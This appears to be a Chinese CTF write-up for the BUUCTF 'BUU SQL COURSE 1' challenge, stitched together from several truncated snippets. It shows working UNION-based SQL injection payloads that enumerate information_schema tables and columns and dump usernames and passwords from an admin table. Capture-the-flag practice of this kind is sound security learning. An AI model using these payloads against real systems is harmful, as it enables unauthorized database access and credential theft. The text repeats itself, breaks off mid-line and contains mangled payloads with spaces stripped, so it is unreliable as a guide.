BUUCTF_BUU SQL COURSE 1 打开实例 发现“热点”及“登录”两个选项 根据题目提示,sql注入,尝试在登录界面寻找注入点,无果 接着进入热点界面,发现三篇新闻,依次点击发现url变化,burp抓包 发现是通过对id值的控制访问不同界面,由此发现注入点 1.判断注入类型,输入1,2
id=0unionselect1,group_concat(table_name)frominformation_schema.tableswheretable_schema=database()# 1、判断是否存在注入、注入是字符型还是数字型 id=1 order by 1# id=1' order by 1# 数字型 2、猜解sql查询语句中的字段数(确定select查出了几列,union前后查询的列数需要一致) id=1 order by 2# ...
id=-1 union select user(),2得到用户root@localhost //group_get()函数用于回显所有数据 开始sql注入爆破表名?id= -1 union select 1, group_concat(table_name) from information_schema.tables where table_schema = 'news'得到表名admin,contens 爆破列名?id= -1 union select 1, group_concat(column_n...
1 ?id=0 UNION SELECT (select group_concat(username,password) from admin),(select group_concat(column_name) from information_schema.columns where table_name='admin' and table_schema='news')--+ 最后把得到的账号名和密码填入得到flag ,一开始我还以为是在ctftraining库里,然后查到一个FLAG_TABLE表...